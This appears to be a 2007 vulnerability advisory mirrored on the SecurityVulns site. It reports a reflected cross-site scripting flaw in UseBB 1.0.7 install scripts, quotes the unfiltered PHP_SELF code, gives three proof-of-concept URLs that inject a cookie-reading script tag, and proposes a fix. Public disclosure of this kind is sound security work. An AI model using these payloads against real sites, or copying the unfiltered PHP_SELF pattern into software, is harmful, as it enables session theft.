Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [MajorSecurity Advisory #51]Virtual Hosting Control System - Session fixation Issue

  [Aria-Security] Munch Pro Remote Login ByPass

  [Aria-Security] Property Pro Remote Login ByPass

  JBlog 1.0 Creat Admin exploit, xss, Cookie Manipulation

From:s4mi_(at)_LinuxMail.org <s4mi_(at)_LinuxMail.org>
Date:22 июля 2007 г.
Subject:UseBB 1.0.x Cross Site Scripting (XSS)

#############################################################
#       Script...............: UseBB version: 1.0.7         #
#       Script Site..........: http://www.usebb.net         #
#       Vulnerability........: Cross Site Scripting (XSS)   #
#       Acces................: Remote                       #
#       level................: Dangerous                    #
#       Author...............: S4mi                         #
#       Contact..............: s4mi[at]LinuxMail.org        #
#############################################################

The affected Files :
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86
=====================
[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden"
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

The variables PHP_SELF is used without filtering

PoC :
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(
document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(
document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(
document.cookie);</ScRiPt>

Solution :
====================

filtre the PHP_SELF
or you know what's the best lool : Delete the Install directory :D

Shoutz :
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server